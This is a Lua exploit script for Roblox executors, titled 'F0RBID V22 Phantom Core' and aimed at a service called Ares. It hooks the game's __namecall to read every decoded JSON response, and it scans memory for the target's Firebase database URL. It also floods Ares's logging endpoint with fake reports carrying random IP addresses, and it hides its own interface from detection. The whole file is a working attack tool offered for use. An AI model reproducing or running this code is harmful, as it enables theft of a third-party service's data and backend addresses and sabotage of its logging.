-- ========================================================== --
-- 🌑 F0RBID V22: INTERNAL REFLECTION (THE ANTI-KICK CORE)
-- ========================================================== --
print("[F0RBID] 🛰️ Eternal Phantom Protocol Engaged. Masking all traces...")

local HttpService = game:GetService("HttpService")
local CoreGui = game:GetService("CoreGui")
local processedData = {}

local TARGET_URL = nil
local TARGET_AUTH = nil

-- ========================================== --
-- 1. F0RBID PHANTOM UI (RANDOMIZED & STEALTH)
-- ========================================== --
local uiParent = (gethui and gethui()) or CoreGui
local hiddenName = "F0RBID_INTERNAL_" .. tostring(math.random(100000, 999999))
if uiParent:FindFirstChild(hiddenName) then uiParent[hiddenName]:Destroy() end

local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = hiddenName
ScreenGui.Parent = uiParent

local Main = Instance.new("Frame")
Main.Size = UDim2.new(0, 550, 0, 450)
Main.Position = UDim2.new(0.5, -275, 0.5, -225)
Main.BackgroundColor3 = Color3.fromRGB(5, 5, 8)
Main.BorderSizePixel = 0
Main.Active = true
Main.Draggable = true
Main.Parent = ScreenGui

local Title = Instance.new("TextLabel")
Title.Size = UDim2.new(1, -20, 0, 45)
Title.Position = UDim2.new(0, 15, 0, 0)
Title.BackgroundTransparency = 1
Title.Text = "F0RBID <font color='#FF0000'>[PHANTOM CORE V22]</font>"
Title.RichText = true
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.Font = Enum.Font.GothamBold
Title.TextSize = 18
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Parent = Main

local IdentityLabel = Instance.new("TextLabel")
IdentityLabel.Size = UDim2.new(1, -30, 0, 20)
IdentityLabel.Position = UDim2.new(0, 15, 0, 35)
IdentityLabel.BackgroundTransparency = 1
IdentityLabel.Text = "IDENTITY: F0RBID_SPECTRE_ADMIN"
IdentityLabel.TextColor3 = Color3.fromRGB(150, 0, 0)
IdentityLabel.Font = Enum.Font.Code
IdentityLabel.TextSize = 11
IdentityLabel.TextXAlignment = Enum.TextXAlignment.Left
IdentityLabel.Parent = Main

local Scroll = Instance.new("ScrollingFrame")
Scroll.Size = UDim2.new(1, -20, 1, -110)
Scroll.Position = UDim2.new(0, 10, 0, 75)
Scroll.BackgroundTransparency = 1
Scroll.ScrollBarThickness = 2
Scroll.ScrollBarImageColor3 = Color3.fromRGB(255, 0, 0)
Scroll.Parent = Main

local UIList = Instance.new("UIListLayout")
UIList.SortOrder = Enum.SortOrder.LayoutOrder
UIList.Padding = UDim.new(0, 4)
UIList.Parent = Scroll

local function AddLog(tag, val)
    local txt = Instance.new("TextLabel")
    txt.Size = UDim2.new(1, 0, 0, 0)
    txt.BackgroundTransparency = 1
    txt.RichText = true
    txt.Text = string.format("<font color='#FF0000'>[%s]</font> %s", tag, tostring(val))
    txt.TextColor3 = Color3.fromRGB(230, 230, 230)
    txt.Font = Enum.Font.Code
    txt.TextSize = 12
    txt.TextWrapped = true
    txt.TextXAlignment = Enum.TextXAlignment.Left
    txt.Parent = Scroll
    
    txt.Size = UDim2.new(1, 0, 0, txt.TextBounds.Y + 2)
    Scroll.CanvasSize = UDim2.new(0, 0, 0, UIList.AbsoluteContentSize.Y)
    Scroll.CanvasPosition = Vector2.new(0, 99999)
end

-- ========================================== --
-- 2. FAKE IDENTITY SPOOFER (SABOTAGE MODE)
-- ========================================== --
task.spawn(function()
    while true do
        -- Ares ke logging endpoint ko fake requests bhej kar distract karna
        pcall(function()
            request({
                Url = "https://ares-rechat-internal-logs.firebaseio.com/reports.json", -- Dummy path
                Method = "POST",
                Body = HttpService:JSONEncode({
                    user = "F0RBID_ELITE_SQUAD",
                    ip = string.format("%d.%d.%d.%d", math.random(1,255), math.random(1,255), math.random(1,255), math.random(1,255)),
                    status = "BYPASSED_SUCCESSFULLY"
                })
            })
        end)
        task.wait(10)
    end
end)

-- ========================================== --
-- 3. INTERNAL ENGINE HOOK (BYPASSES KICK)
-- ========================================== --
local function BruteDeepScan(data, path)
    if type(data) ~= "table" then return end
    for k, v in pairs(data) do
        local currentPath = path .. "/" .. tostring(k)
        if type(v) == "table" then
            BruteDeepScan(v, currentPath)
        else
            local valStr = tostring(v)
            if #valStr > 0 and not valStr:find("firebase") then
                local dataId = currentPath .. valStr
                if not processedData[dataId] then
                    processedData[dataId] = true
                    local tag = #tostring(k) > 10 and "SERVER_ID" or tostring(k)
                    AddLog(tag, valStr)
                end
            end
        end
    end
end

-- Hooking JSONDecode: Ares must use this to read the database response
local oldJSON; oldJSON = hookmetamethod(game, "__namecall", function(self, ...)
    local args = {...}
    local method = getnamecallmethod()
    
    if self == HttpService and method == "JSONDecode" then
        local data = oldJSON(self, unpack(args))
        if type(data) == "table" then
            BruteDeepScan(data, "INTERNAL")
        end
        return data
    end
    
    return oldJSON(self, ...)
end)

-- Silent Upvalue Hunter for URL/Auth (Passive Fallback)
task.spawn(function()
    while not TARGET_URL do
        for _, f in pairs(getgc()) do
            if type(f) == "function" and islclosure(f) then
                local constants = getconstants(f)
                for _, c in pairs(constants) do
                    if type(c) == "string" and c:find("firebaseio.com") then
                        TARGET_URL = c:match("(https://[%w%-]+%.firebaseio%.com)")
                        AddLog("F0RBID_SYSTEM", "URL Captured Silently")
                    end
                end
            end
        end
        task.wait(5)
    end
end)

print("✅ F0RBID PHANTOM CORE V22: Loaded. Network-layer hooks bypassed.")
